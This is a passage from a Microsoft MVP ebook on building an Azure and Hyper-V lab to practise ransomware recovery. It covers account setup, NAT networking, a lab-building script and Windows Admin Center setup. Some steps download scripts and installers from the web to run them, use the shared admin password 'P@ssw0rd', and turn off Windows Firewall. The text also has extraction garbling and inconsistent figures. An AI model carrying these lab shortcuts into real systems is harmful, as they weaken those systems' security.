Dave Kawula - Emile Cabot - Cary Sun - Cristal Kawula - John O'Neill Sr. - Surviving A Ransomware Attack With Azure Site Recovery

Surviving a Ransomware
Attack with Azure Site

Recovery
Volume 1
By Microsoft MVP’s:
Dave Kawula Cristal Kawula
Emile Cabot Cary Sun
John O’Neill Sr - rMVP
PUBLISHED BY
MVPDays Publishing
http://www.mvpdays.com
Copyright © 2019 by MVPDays Publishing
All rights reserved. No part of this book may be reproduced or transmitted in any form or by any
means without the prior written permission of the publisher.
ISBN: TBD
Warning and Disclaimer

Every effort has been made to make this manual as complete and as accurate as possible, but no
warranty or fitness is implied. The information provided is on an “as is” basis. The authors and
the publisher shall have neither liability nor responsibility to any person or entity concerning any
loss or damages arising from the information contained in this book.
Feedback Information
We’d like to hear from you! If you have any comments about how we could improve the quality
of this book, please don’t hesitate to contact us by visiting www.checkyourlogs.net or sending an
email to dave@mvpdays.com.
iii
Acknowledgments
Foreword by
Acknowledgments
From Dave
Cristal, you are my rock and my source of inspiration. For the past 20 + years you have been
there with me every step of the way. Not only are you the “BEST Wife” in the world you are my
partner in crime. Christian, Trinity, Keira, Serena, Mickaila, Mackenzie, and Rycker, you kids, are
so patient with your dear old dad when he locks himself away in the office for yet another book.
Taking the time to watch you grow in life, sports, and become little leaders of this new world is
incredible to watch.
Thank you, Mom and Dad, (Frank and Audry) and my brother Joe. You got me started in this
crazy IT world when I was so young. Brother, you mentored me along the way both coaching me
in hockey and helping me learn what you knew about PCs and Servers. I’ll never forget us as
teenage kids working the IT Support contract for the local municipal government. Remember
dad had to drive us to site because you weren’t old enough to drive ourselves yet. A great
career starts with the support of your family, and I’m so lucky because I have all the support one
could ever want.
Last but not least, the MVPDays volunteers, you have donated your time and expertise and
helped us run the event in over 20 cities across North America. Our latest journey has us
expanding the conference worldwide as a virtual conference. For those of you that will read this
book, your potential is limitless just expand your horizons, and you never know where life will
take you.
iii
About the Authors
About the Authors

Dave Kawula – Microsoft MVP
Dave is a Microsoft Most Valuable Professional (MVP) with over 20 years of experience in the IT
industry. His background includes data communications networks within multi-server
environments, and he has led architecture teams for virtualization, System Center, Exchange,
Active Directory, and Internet gateways. Very active within the Microsoft technical and
consulting teams, Dave has provided deep-dive technical knowledge and subject matter
expertise on various System Center and operating system topics.
Dave is well-known in the community as an evangelist for Microsoft, 1E, and Veeam
technologies. Locating Dave is easy as he speaks at several conferences and sessions each year,
including TechEd, Ignite, MVP Days Community Roadshow, and VeeamOn.
Recently Dave has been honored to take on the role of Conference Co-Chair of TechMentor with
fellow MVP Sami Laiho. The lineup of speakers and attendees that have been to this conference
over the past 20 years is fantastic. Come down to Redmond or Orlando in 2018, and you can
meet him in person. Checkout his speaking site at www.davekawula.com
He recently tied for 1st place out of 1800 speakers at the Microsoft Ignite Conference in Orlando.
As the founder and Managing Principal Consultant at TriCon Elite Consulting, Dave is a leading
technology expert for both local customers and large international enterprises, providing optimal
guidance and methodologies to achieve and maintain an efficient infrastructure.
BLOG: www.checkyourlogs.net
Twitter: @DaveKawula
iv
About the Authors
Cristal Kawula – Microsoft MVP

Cristal Kawula is the co-founder of MVPDays Community Roadshow and #MVPHour live Twitter
Chat. She was also a member of the Technical Advisory board and is the President of TriCon Elite
Consulting. Cristal is also only the 2nd Woman in the world to receive the prestigious Veeam
Vanguard award.
Cristal can be found speaking at Microsoft Ignite, MVPDays, and other local user groups. She is
extremely active in the community and has recently helped publish a book for other Women
MVP’s called Voices from the Data Platform.
This year at Microsoft Ignite she lead community meetups for various topics such as Women in
IT, Parenting in IT, Diversity in Tech, and becoming a Community Rockstar.
BLOG: http://www.checkyourlogs.net
Twitter: @supercristal1
v
About the Authors
Emile Cabot – Microsoft MVP

Emile started in the industry during the mid-90s working at an ISP and designing celebrity web
sites. He has a strong operational background specializing in Systems Management and
collaboration solutions and has spent many years performing infrastructure analyses and
solution implementations for organizations ranging from 20 to over 200,000 employees.
Coupling his wealth of experience with a small partner network, Emile works very closely with
TriCon Elite, 1E, and Veeam to deliver low-cost solutions with minimal infrastructure
requirements.
He actively volunteers as a member of the Canadian Ski Patrol, providing over 250 hours each
year for first aid services and public education at Castle Mountain Resort and in the community.
BLOG: http://www.checkyourlogs.net
Twitter: @ecabot
vi
About the Authors
Cary Sun – Microsoft MVP
Cary Sun is CISCO CERTIFIED INTERNETWORK EXPERT (CCIE No.4531) and MCSE, MCIPT, Citrix
CCA with over twenty years in the planning, design, and implementation of network technologies
and Management and system integration. Background includes hands-on experience with multi-
platform, all LAN/WAN topologies, network administration, E-mail and Internet systems, security
products, PCs and Servers environment. Expertise is analyzing user’s needs and coordinating
system designs from concept through implementation. Exceptional analysis, organization,
communication, and interpersonal skills. Demonstrated ability to work independently or as an
integral part of a team to achieve objectives and goals. Specialties: CCIE /CCNA / MCSE / MCITP /
MCTS / MCSA / Solution Expert / CCA
Cary’s is a very active blogger at checkyourlogs.net and always available online for questions
from the community. He passion for technology is contagious, and he makes everyone around
him better at what they do.
Blog:http://www.checkyourlogs.net
Twitter:@SifuSun
vii
About the Authors
John O’Neill Sr – Re-Connect Microsoft MVP
viii
Contents
Contents
Foreword by .................................................................................................................. iii
Acknowledgments ........................................................................................................ iii

From Dave ............................................................................................................. iii
About the Authors ........................................................................................................ iv

Dave Kawula – Microsoft MVP .................................................................................... iv
Cristal Kawula – Microsoft MVP ................................................................................... v
Emile Cabot – Microsoft MVP ..................................................................................... vi
Cary Sun – Microsoft MVP ......................................................................................... vii
John O’Neill Sr – Re-Connect Microsoft MVP .......................................................... viii
Contents........................................................................................................................ ix
Introduction ................................................................................................................. 14
MVPDays Online .......................................................................................................... 14

Sample Files ............................................................................................................. 15
Additional Resources ................................................................................................ 15
Chapter 1...................................................................................................................... 17
Setting up your Azure Subscription from Scratch .................................................... 17
Chapter 2...................................................................................................................... 24
Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure ........... 24
ix
Contents
Building a Windows Server 2016 Virtual Machine ................................................ 24

Creating Multiple Internal and External IP’s for the Lab ........................................ 35
Enable Hyper-V in the LAB Virtual Machine ......................................................... 42
Configuring NAT Networking with one Public IP Address ..................................... 50
Configuring NAT Networking with Multiple Public IP Address ................................... 53
Adding an IP Address to the lab Host (VM) .......................................................... 53
Configuring Routing and Remote Access on the Azure Nested Virtual Machine... 57
Configure NAT Rules in RRAS for the Lab ........................................................... 65
Disable Windows Firewall .................................................................................... 72
Create a NAT Rule in the Azure NSG for the Lab................................................. 74
Testing the NAT Rules in the lab .......................................................................... 80
Using PowerShell to automate RRAS NAT Rule Configurations........................... 85
Chapter 3...................................................................................................................... 88
Using BigDemo to Build your Lab .............................................................................. 88

Lab Server Names .................................................................................................... 88
Building the Lab with BigDemo_ASR_WAC.PS1 ...................................................... 91
Chapter 4...................................................................................................................... 95
Configuring Windows Admin Center ......................................................................... 95

Install Google Chrome and Mozilla FireFox .......................................................... 96
Configure Windows Admin Center........................................................................ 97
Configure Azure Integration.................................................................................. 99
Configure Azure Backup .................................................................................... 104
Verifying Backups locally with the Backup Microsoft Azure Backup Agent ......... 110
Configuring Windows Azure Update Management ............................................. 112
x
Contents
Configure Azure Site Recovery .......................................................................... 119

Upgrade to Security Center Standard in Azure ................................................... 125
Chapter 5.................................................................................................................... 127
Windows Defender Advanced Threat Protection ATP ............................................ 127

Onboarding a Server with Windows Defender ATP ............................................ 128
Reviewing an Incident with Windows Defender Advanced Threat Protection ..... 130
Chapter 6.................................................................................................................... 133
Simulating a Ransomware Attack ............................................................................ 133

KnowBe4 Ransomware Simulator on Windows Server 2019.............................. 133
Enabling Ransomware Protection on Windows Server 2019 .............................. 141
Executing a Ransomware Attack with PowerShell .............................................. 145
Chapter 7.................................................................................................................... 152
Recovering from Ransomware using Azure Site Recovery ................................... 152

Notes from the Field................................................................................................ 152
Why Airgapped Replicas are the only choice ..................................................... 152
Why Planned Failover is no longer an option ..................................................... 152
Failover Now is the only Option .......................................................................... 153
Watch you Six (Clock) ........................................................................................ 153
Do not connect your Azure Site Recovery Virtual Machines to a live Site-to-Site
VPN ................................................................................................................... 154
When can I get back into my data? .................................................................... 154
Ok, so I didn’t listen and lost everything now what? ........................................... 155
Don’t forget to tune your Replication Policy ........................................................ 156
Testing Failover can be a quick Ransomware Fix .............................................. 156
xi
Contents
Reset Settings for your Azure Site Recovery Hyper-V Host................................ 157
Enable Diagnostic Logging for Azure Site Recovery........................................... 162
Zero Day time to Failover ........................................................................................ 163
Assuming an Admin Level breach Failing over 100 % to Azure .......................... 163
Executing a PowerShell based Ransomware Attack on Domain Controllers. ..... 163
Encrypting the Sysvol Folder .............................................................................. 165
Taking Down Production Killing Domain Controllers with Ransomware .............. 171
Encrypting the Active Directory Database .......................................................... 171
Survival Mode Recovering to Azure ........................................................................ 178
Tick Tock time to make a decision – We are Recovering to Azure ..................... 179
Performing the Double Swing Recovery ............................................................. 180
Chapter 8.................................................................................................................... 188
Disaster Recovery items left forgotten .................................................................... 188
Chapter 9.................................................................................................................... 189
Join us at MVPDays and meet great MVP’s like this in person .............................. 189
Live Presentations .................................................................................................. 189
Video Training......................................................................................................... 189
Live Instructor-led Classes ...................................................................................... 190
Consulting Services ................................................................................................ 190
xii
Contents
xiii
Introduction MVPDays Online
Introduction
MVPDays Online
The purpose of this book is to showcase the fantastic expertise of our guest speakers of
MVPDays Online. They have so much passion, expertise, and expert knowledge that it only
seemed fitting to write it down in a book.
MVPDays was founded by Cristal and Dave Kawula back in 2013. It started as a simple idea;
“There’s got to be a good way for Microsoft MVPs to reach the IT community and share their
vast knowledge and experience in a fun and engaging way” I mean, what is the point in
recognizing these bright and inspiring individuals, and not leveraging them to inspire the
community that they are a part of.
We often get asked the question “Who should attend MVPDays”?
Anyone that has an interest in technology is eager to learn and wants to meet other like-minded
individuals. This Roadshow is not just for Microsoft MVP’s it is for anyone in the IT Community.
Make sure you check out the MVPDays website at www.mvpdays.com. You never know maybe
the roadshow will be coming to a city near you.
The goal of this particular book is to show you how to survive a Ransomware Attack using Azure
Site Recovery. Each chapter is broken down into a unique tip, and we hope you find some
immense value in what we have written.
14
Sample Files
All sample files for this book can be downloaded from www.checkyourlogs.net and
https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery
Additional Resources
In addition to all the tips and tricks provided in this book, you can find extra resources like
articles and video recordings on our blog http://www.checkyourlogs.net
15
16
Chapter 1 Setting up your Azure Subscription from Scratch
Chapter 1
Setting up your Azure

Subscription from Scratch
As we know, there are lots of features in Microsoft Azure, to use those features, you need to
create a Microsoft Azure account, it’s straightforward to create, also you will get $200 credits at
the first month.
If you are a newcomer on Microsoft Azure, no worry, I am going to show you how to create
Azure free account with $200 credit today, follow the steps as below.
1. Go to https://www.azure.com and then click Free account.
17
2. On the free account page, click Start free.
3. If you have an account with Microsoft already (e.g., office 365, outlookf.com …. ), enter
your email address and then click Next. If you don’t have Microsoft account, please click
Crete one.
4. If your email address is used with more than on account from Microsoft, you need to
select which account do you want to use.
18
5. Enter your password and then click Sign in
19
6. On the About you page, enter your personal information and then click Next.
7. On the Identity verification by card page, you need to enter your credit card information
and then click Next. Don’t worry, Microsoft won’t charge you until you upgrade your free
20
account to pay as you go or others account type.
8. On the Agreement page, select I agree to the subscription agreement, offer details, and
privacy statement and I would like information, tips, and offers from Microsoft or
selected partners about Azure, including Azure Newsletter, Pricing updates, and other
21
Microsoft products and services, and then click Sign up.
9. Congratulation! You’re ready to start with Azure and get $250 create for free. You need
to click Go to the portal and enjoy Azure features there.
10. That’s it you have now successfully setup your first Azure Tenant and have access to the
Azure Portal.
22
23
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Chapter 2
Building a Hyper-V Nested VM

with Multiple Public IP
Addresses in Azure
In this chapter, we are going to show you how to build a Hyper-V nested VM with multiple public
IP addresses. In this lab configuration, you only need to pay Microsoft for one Hyper-V host
(VM) with storage and public IP addresses. After it is configured, you can install a firewall, create
VMs, a load balancer, configure customer routing, port forwarding and so on. These scenarios
can be used to build up real-world labs for Test, Development, or even proof of concepts.
Building a Windows Server 2016 Virtual Machine
1. Logon to your Microsoft Azure Account and select Create a resource.
24
2. On the New page, select Windows Server 2016 VM
3. On the Create a virtual machine page, click Basics and select your Azure Subscription to
pay for this virtual machine.
4. Select Create new under the Resource group and enter resource group name, I will
recommend it as your virtual machine name, because it will easy to maintain your
25
resources, and then click OK.
5. Virtual Machine Name: Enter Virtual Machine Name as your resource group name.
Region: Select Region for the virtual machine. For my case, I am using West US 2.
Availability options: keep the default setting
Image: select Windows Server 2016 Datacenter
Size: click change size and select the Dv3 and Ev3 VM sizes. Because we need to enable
nested virtualization.
Username: Enter login user name
Password: Enter login password
26
Confirm password: Reenter login password
Public inbound ports: Select Allow selected ports.

Select inbound ports: Select RDP (3389)
Already have a Windows license: Select Yes if you have a license already.
Confirmation: select I confirm I have an eligible Windows license with Software
Assurance or Windows Server subscription to apply for this Azure Hybrid Benefit.
27
6. On the Create a Virtual Machine page, click Disks.
OS disk type: Select Premium SSD

DATA DISKS: Select Create and attach a new disk (this storage space is for your nested
VMs)
28
7. On the Create a new disk page, settings as follow and then click OK.
Disk type: Select Premium SSD
Name: keep the default name
Size(GiB): 4095
Source type: None
29
8. On the Create a virtual machine page, click Networking.
Virtual network: Select vnet if you have existing vnet if not, you can keep the default
settings.
Subnet: Select subnet name if you have an existing subnet; if not, you can keep the
default settings.
Public IP: click Create new
30
9. On the Create Public IP address page, the settings are as follows

Name: Enter the Public IP address name.
SKU: Basic
Assignment: Static
10. To complete Networking settings as follow:
Network security group: Basic
Public inbound ports: Allow selected ports
Select inbound ports: RDP
31
Accelerated networking: On
1. On the Create a virtual machine page, click Management and keep the settings as
default.
32
11. On the Create a virtual machine page, click Guest config and keep the settings as default.
12. On the Create a virtual machine page, click Tags and keep the settings as default.
33
13. On the Create a virtual machine page, click Review + create and make sure Validation
passed and then click Create.
34
Creating Multiple Internal and External IP’s for the Lab
1. On the Microsoft Azure portal page, select Virtual machines.
2. On the Virtual machines page, click GDMCALABHV1.
35
3. On the GDMCALABHV1page, select Networking.
4. On the GDMCALABHV1-Networking page, select Network Interface: gdmcalabhv1238.
5. On the Network Interface page, select IP configurations.
36
6. On the IP configurations page, select ipconfig1.
7. Change assignment setting from Dynamic to Static, and then click Save.
8. Go back to the IP configurations page, click Add.
9. On the Add IP configuration page, settings as follow and then click OK.
37
Name: ipconfig2
Private IP address Allocation: Static
IP address: 10.10.1.9
Public IP address: Enable
IP address: click configure required settings
10. Choose public IP address: Create new
Name: Enter name for Public IP
SKU: Basic
38
Assignment: Static and then click OK
Choose public IP address: Create new
Name: Enter name for Public IP
SKU: Basic
Assignment: Static and then click OK
39
11. On the Add IP configuration page, click OK.
40
12. Repeat Add IP configurations steps If you need more public IP addresses.
41
Enable Hyper-V in the LAB Virtual Machine
1. Start Azure virtual machine and log in.
2. Open Disk Management to partition and format for your new 4TB storage space. (Use
ReFS + 64 KB Block Size.)
42
3. On the Server Manager Dashboard, click Add roles and feature.
4. On the Before you begin page, click Next.
43
5. On the Select installation type, select Role-based or feature-based installation and then
click Next.
6. On the Select destination server page, click Next.
44
7. On the Select server roles page, select Hyper-V, click Add Features and then click Next.
8. On the Select features page, click Next.
45
9. On the Hyper-V page, click Next.
10. On the Create Virtual Switches page, don’t select any interface and click Next.
46
11. One the Virtual Migration page, click Next.
12. On the Default Stores page, you can change the default location to your new 4TB storage
space and then click Next.
47
13. On the Confirm installation selections page, select Restart the destination server
automatically if required and then click install.
14. Login to Azure Virtual machine after it restarted.
15. On the installation progress page, click Close.
48
49
Configuring NAT Networking with one Public IP Address
To configure NAT Networking, we need to create an Internal Virtual Switch for nested guest VMs.
In general, there are two options for networking with nested virtual machines, MAC Address
Spoofing, and NAT networking. Unfortunately, MAC Address Spoofing is not possible in a public
cloud environment. So, If you are using an Azure virtual machine network interface as your
Hyper-V external virtual switch and have assigned it to nested guest VMS, the guest VMs won’t
be able to access the Internet. At this point, we have no choice, but to use NAT networking.
The steps below show how to configure a NetNat Virtual Switch with a single Public IP Address.
1. We can create an internal virtual switch and create NAT rules via Powershell cmdlet as
follow:
NNew-VMSwitch -Name "NATNetwork" -SwitchType Internal

Get-NetAdapter
New-NetIPAddress -IPAddress 192.168.100.1 -PrefixLength 24 -
InterfaceIndex 14
New-NetNat -Name "NATNetwork" -InternalIPInterfaceAddressPrefix
192.168.100.0/24
50
2. You also can configure port forwarding by Powershell cmdlet as follow:
Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 443

-Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 443 -
NatName NatNetwork
51
Add-NetNatStaticMapping -ExternalIPAddress "0.0.0.0/24" -ExternalPort 80

-Protocol TCP -InternalIPAddress 192.168.100.99 -InternalPort 80 -NatName
NatNetwork
52
Configuring NAT Networking with Multiple

Public IP Address
For a real proof of concept (PoC) or production environment, we may need more than one public
IP address. We have found that this isn’t possible with the NetNat Internal vSwitch. As a result,
we have figured out how to set this up using Microsoft Routing and Remote Access on the Host
(Azure VM). Following these steps are going to be the most critical part of this book.
These steps allow us to add as many External Public IP Addresses in Azure and NAT them into our
Lab Virtual Machines. This gives you the most realistic lab experience possible.
Adding an IP Address to the lab Host (VM)

1. Login to Azure Virtual Machine.
2. Open Command prompt and run ipconfig /all and then write down the DNS IP address.
3. Add all of the IP addresses to the Azure Virtual Machine network interface, for my case
are 10.10.1.8-10
53
4. Re-run ipconfig /all again, and you will now see all of IP addresses under the network
interface.
5. Open Hyper-V Manager tool and click Virtual Switch Manager.
54
6. Select Internal and click Create Virtual Switch.
55
7. Change switch name to NAT Network Switch and then click OK.
8. Assign IP address as 192.168.100.1/24 to vEthernet (NAT Network Switch)
56
Configuring Routing and Remote Access on the Azure Nested

Virtual Machine
To configure Port Forwarding (NAT) into our lab we will use the Built-In Routing and Remote
Access role in Windows. The steps below will walk you through the configuration required.
1. Login to the Nested Azure Virtual Machine.

1. On the Dashboard page, select Add Roles and features
2. On the Before you begin page, click Next.
3. On the Select installation type page, click Next.
4. On the Select destination server page, click Next.
5. On the Select server roles page, select Remote Access and click Next.
6. On the Select features page, click Next.
7. On the Remote Access page, click Next.
8. On the Select Role Services page, select Routing and click Add Features and then click
Next.
9. On the Web Server Role (IIS) page, click Next.

57
10. On the Select role services page, click Next.

11. On the Confirm installation selections page, select Restart the destination server
atomically if required, click Install.
12. On the Installation progress page, click Close.

13. Open Routing and Remote Access tool.
58
14. Right-click the server name and select Configure and Enable Routing and Remote Access.
15. On the Welcome page, click Next.
59
16. On the Configuration page, select Network address translation (NAT), click Next.
60
17. On the NAT Internet Connection page, select Ethernet 2 as public Interface, click Next.
61
18. On the Name and Address Translation Services page, select Enable basic name and
address services, click Next.
62
19. On the Address Assignment Range page, click Next.
63
20. Click Finish on the Completing setup wizard page.
64
Configure NAT Rules in RRAS for the Lab

1. Open Routing and Remote Access, Expand the IPv4 and select NAT.
2. Right-click Ethernet 2 and select Properties.
65
3. Select Address Pool and click Add.
66
4. Enter IP addresses and mask and click OK, those IP addresses are being created with
Public IP addresses at the azure portal.
67
5. Select Services and Ports and then click Add.
6. Settings as follow for TCP port 443 port forwarding and then click OK.
Description of Services: TCP443-10.10.1.10
On this address pool entry: 10.10.1.10
Protocol: TCP
Incoming port: 443
Private IP address: 192.168.100.99
68
Outgoing port: 443
7. On the Ethernet 2 properties page, click OK.
69
8. You can repeat steps to create it for port 80 and port 3389 as well.
70
71
Disable Windows Firewall

1. We will use Azure NSG, so please disable windows firewall at Azure Virtual Machine.
2. On the Server Manager page, select Local Server and then select Windows Firewall Public
ON, Private On.
3. On the Windows Firewall page, select Turn Windows Firewall on or off.
72
4. On the customize page, select turn off Windows Firewall on Private Network and Public
Network and then click OK.
73
Create a NAT Rule in the Azure NSG for the Lab

The following steps will show you how to create a NAT Rule on the Azure NSG.
1. Go back to the Azure portal and log in with your account.
2. On the Dashboard page, select Virtual machines.
74
3. On the Virtual machines page, select the Virtual machine which you are using as Hyper-V
host.
4. One the GDMCALABHV1 virtual machine page, select Networking.
75
5. On the Networking page, click Add inbound port rule.
76
6. On the Add inbound security rule, change Destination port rages to 443, Protocol to TCP,
Name to Port_443 and then click Add.
77
78
7. Repeat steps to add port 80.
79
Testing the NAT Rules in the lab

Now, we can test the port forwarding functionality and make sure it is working.
1. Create a Guest Virtual Machine on the Nested Azure Host (VM). Make sure the network
adapter is configured to use the NAT Network Switch, and assign IP address of
192.168.100.99/24, the default gateway is 192.168.100.1, you can use the 8.8.8.8 as
DNS.
80
81
2. Enable remote desktop for test RDP (TCP port 3389) and turn off Windows firewall.
3. Install IIS features on this machine. If you would like to test SSL (Port 443) setup and
configure the SSL Certificate in IIS.
82
4. Let’s do RDP to from Internet to Web-Test machine via Public IP address

(GDMCALABHV1-PublicIP3).
5. If you can successfully connect your NAT Rules are working through the Azure NSG and
also through the RRAS configuration on the Nested Host in Azure.
6. Next, test Port 80 from the internet via (GDMCALABHV1-PublicIP3), and it will show you
the default IIS website. This also validates that the Port Forwarding is working.
83
7. Last you can validate the NAT Session Mapping on the Azure Nested Host (VM) using the
Routing and Remote Access tool.
84
Using PowerShell to automate RRAS NAT Rule Configurations

Configuring NAT Rules in Routing and Remote Access can be very time consuming and tedious.
In the steps below we will show you how to bulk configure rules using PowerShell.
First, review the following code:
$Port=1000
$HostInterfaceName="Ethernet 4"
$Protocol="TCP"
$PublicIP="10.10.1.101"
$PrivateIP="192.168.100.101"
for ($Port=1000; $Port -le 1010; $Port++)
{netsh routing ip nat add portmapping name=$HostInterfaceName proto=$Protocol
publicip=$PublicIP publicport=$Port privateip=$PrivateIP privateport=$Port
}
This will create a Custom Service (NAT Rule) in Routing and Remote Access on Interface Ethernet
4, TCP, Ports 1000-1010.
Let’s run the script and see what happens.
85
You can also run netsh routing dump to see the output.
Overall, this is an easy way to automate the creation of the NAT Rules for your lab.
86
87
Chapter 3 Using BigDemo to Build your Lab
Chapter 3
Using BigDemo to Build your

Lab
Lab Server Names

The following table describes the required Virtual Machines to build this lab. This lab is designed
to be built on a Hyper-V Host Server with a minimum of 16 GB of RAM. An automation script
called BigDemo_ASR_WAC.ps1 has been used to provision this lab environment. You can
download a copy from here: https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-
Azure-Site-Recovery/blob/master/BigDemo_ASR_WAC.ps1
88
Hostname Role Operating System
DC01 Primary Domain Controller Windows Server 2019

running Active Directory
Certificate Services as an
Enterprise Root
DC02 Secondary Domain Controller Windows Server 2019

running Active Directory
S2D2019-1 Storage Spaces Direct – Hyper- Windows Server 2019

V Cluster Node LTSC

V Cluster Node LTSC

V Cluster Node LTSC

V Cluster Node LTSC

V Cluster Node LTSC

V Cluster Node LTSC

V Cluster Node LTSC

V Cluster Node LTSC
S2D2019DR-1 Storage Spaces Direct – Hyper- Windows Server 2019

V Cluster Node LTSC

V Cluster Node LTSC
89

V Cluster Node LTSC

V Cluster Node LTSC
DRTitan01 Standalone – Hyper-V Cluster Windows Server 2019

Node LTSC
Router01 Windows NAT Router for the Windows Server 2019

LAB
DHCP01 DHCP Server for the Lab Windows Server 2019
Management01 Management01 Windows Server 2019
AZHVHost DS8 Virtual Machine in Azure Windows Server 2019

running Nested Virtualization
and Hyper-V. This will be the
host that we run the lab on.
This could also be a Laptop or
a physical server in your
environment.
90
Building the Lab with

BigDemo_ASR_WAC.PS1
For this book, we wanted to help you build a lab that you could easily follow along with. If you
have read some of our other books, you would have seen a script that we use called BigDemo.
BigDemo is a PowerShell script that builds a lab environment including AD, DHCP, Management
Servers, Clients, Application Servers, and others. It is highly customizable, and we have created
an extraordinary edition just for this book. Follow the instructions below to download the script
from our Github Repository and start building your very own lab to follow along with.
Instructions Screenshot (if applicable)
1. Logon to the AZHVHost

machine in Azure as
Administrator
2. Open an administrative
Invoke-WebRequest -Uri "
PowerShell prompt and https://raw.githubusercontent.com/dkawula/Surviving-
a-Ransomware-Attack-Using-Azure-Site-
type: Recovery/master/BigDemo_ASR_WAC.ps1" -OutFile
"C:\Post-Install\BigDemo_ASR_WAC.PS1"
3. Next Download a copy of https://www.microsoft.com/en-us/evalcenter/evaluate-

windows-server-2016/
Windows Server 2016
RTM from the Microsoft
Eval Center. For our lab,
we have a drive on our
Hyper-V Host F:\
91
Save the ISO to

F:\DCBuild_Insider
4. Next Download a copy of https://blogs.windows.com/windowsexperience/2018/01/23/an

Windows Server Insider nouncing-windows-server-insider-preview-build-17079/
17079 Microsoft Eval
Center. For our lab, we
have a drive on our
Hyper-V Host F:\
Save the ISO to

F:\DCBuild_Insider
5. Copy
BigDemo_Insider.PS1
from C:\Post-Install to
F:\DCBuild_Insider
6. Open
BigDemo_Insider.PS1
with the PowerShell ISE
edit lines 425 and 434
putting in Your Product
key received with the
EVAL Version of Windows
Server 2016 Downloaded
above
7. Edit line 422 $ServerISO

with the actual path and
name of your Server ISO
92
Downloaded which should

have been downloaded to
something like
F:\DCBuild_Insider
Save
BigDemo_Insider.PS1
8. Open an administrative
PowerShell prompt. Run
BigDemo_Insider.PS1
For this book we have

used the following
parameters:
WorkingDir:
f:\DCBuild_Insider
Organization: MVPDays
Rockstars
Owner: Dave Kawula
TimeZone: Mountain
Standard Time
AdminPassword:
P@ssw0rd
DomainName:
MVPDays.com
DomainAdminPassword:
93
P@ssw0rd
VirtualSwitchName:
MVPDays_VMM_VSwitch
Subnet: 172.16.100.
ExtraLabFiles: C:\
9. It will take
approximately 1 hour
to build the Lab
Environment
With BigDemo you can create a new Lab Environment on demand. This script has built out
Active Directory, DHCP, DNS, and the other core infrastructure components required to get
started with your lab.
94
Chapter 4 Configuring Windows Admin Center
Chapter 4
Configuring Windows Admin

Center
In this chapter, we will look at setting up Windows Admin Center in the Lab. We have already
installed Windows Admin Center and will start with the basic configurations. For your
reference, we used the following PowerShell Function during provisioning to Download and
Installed Windows Admin Center to the Management Virtual Machine.
Function Install-WindowsAdminCenter {
param
(
[string]$VMName,
[string]$GuestOSName,
[string]$VMPath,
[string]$WorkingDir
)
#Download Windows Admin Center to c:\post-install
Invoke-Command -VMName $VMName -Credential $domainCred {
New-Item -ItemType Directory -Path "c:\Post-Install" -Force:$true | Out-

Null
Write-Output "Downloading Windows Admin Center"
#Ping the internet to get things working in the lab
ping www.google.com
95
Invoke-WebRequest -UseBasicParsing -Uri https://aka.ms/WACDownload -OutFile

"c:\Post-Install\WindowsAdminCenter.msi"
Write-Output "Installing Windows Admin Center"

Start-Process msiexec.exe -Wait -ArgumentList "/i c:\post-
install\WindowsAdminCenter.msi /qn /L*v log.txt SME_PORT=6516
SSL_CERTIFICATE_OPTION=generate"
Install Google Chrome and Mozilla FireFox

You are probably wondering why we would install Google Chrome and Mozilla Firefox in the lab.
The answer is very simple, and in short, it is because Microsoft Edge does not ship with the
Server Operating Systems and we cannot configure Windows Admin Center without an alternate
browser. Once we have things initially configured, we could easily use Edge from another
Windows 10 Desktop.
1. Logon to Management01
as Administrator
96
2. Download and Install

Google Chorme and
Mozilla Firefox
Configure Windows Admin Center

In the following steps, we will configure Windows Admin Center with the base configurations.
as Administrator
97
2. Open FireFox and browse

to https://localhost:6516
3. Click Advanced and
accept the Security
Warnings to continue.
4. Logon with Domain

Admin Credentials
5. Click on Skip Tour
98
6. Click on Management01
7. Verify that Windows

Admin Center connects
and is working
8.
Configure Azure Integration

In these steps, we will configure Microsoft Azure Integration with Windows Admin Center.
These steps are required to configure Hybrid Services such as Azure Backup and Azure Site
Recovery.
99
as Administrator

accept the Security

Admin Credentials
5. Click on the Settings

Wheel in the top right
corner of Windows Admin
Center
6. Verify that Windows

Admin Center connects
and is working
100
7. Click on Azure option in

the Menu. Then Click
register.
8. On the Register, the

gateway with Azure click
Copy Code and click
Device Logon
9. On the Device, Logon

screen paste the code and
click Continue
101
10. Sign In with your Azure

tenant Credentials
11. Close the Microsoft Azure

PowerShell Window as
prompted.
12. Select your tenant ID and

click Register. If you
don’t know what your
tenant ID is you can click
102
on Azure Active Directory

and click Properties.
13. Verify that you see the

message successfully
registered with Azure
Active Directory.
14. Click on Go to Azure AD

app Registration
15. On the Azure App Settings

Page Click Settings and
then click Required
Permissions
103
16. Click Grant Permissions

and click Yes
17. Once completed click the

close button in Windows
Admin Center.
Configure Azure Backup

In these steps, we will test Azure Hybrid integration by setting up Azure Backup on the
Management Server.
as Administrator
104

accept the Security

Admin Credentials
5. Click on Mangement01
6. Click on Backup and click

on Setup Azure Backup
105
7. On the Azure, Backup tab

Click on Login and Login
8. On the Setup Azure

Backup page click Step 2,
Show Details, Change the
region to your local region
9. On Step 3 Select c:\ and

System State
10. On Step 3 confirm the

Backup Schedule
106
11. On Step 4 – Enter an

Encryption Passphrase
12. Click Apply
13. Wait while your recovery

vault is created
Note: Windows Admin

Center will create a new
recovery Vault for each
machine that is
protected. This is
configured this way to
avoid throttling of the
accounts.
14. Wait until the Azure

Backup setup is complete
before changing tabs.
107
15. Once complete verify the

settings. Note: This is a
great way to test
Windows Admin Center
integration.
16. Test the Backup to the

Recovery Vault by clicking
Backup Now
108
17. Choose Files and Folders

and click Backup
18. You will notice that a job

has kicked off for the
backup
109
19. You will notice that a job

backup is in progress
Verifying Backups locally with the Backup Microsoft Azure

Backup Agent
We can check the status of our Azure Backups with the local Azure Backup Agent that has been
installed from Windows Admin Center.
as Administrator
110
2. On the desktop click on

Microsoft Azure Backup
3. Verify your backups or

jobs in progress locally
here
111
Configuring Windows Azure Update Management

An important part of our Ransomware defense strategy is keeping updated with Windows
Updates and Rollups. This can be easily accomplished by integrating Windows Admin Center
with Azure Update Management. In the following steps, we will show you how to setup Azure
Update Management to keep your servers up to date.
as Administrator

accept the Security

Admin Credentials
112
5. Click on Mangement01
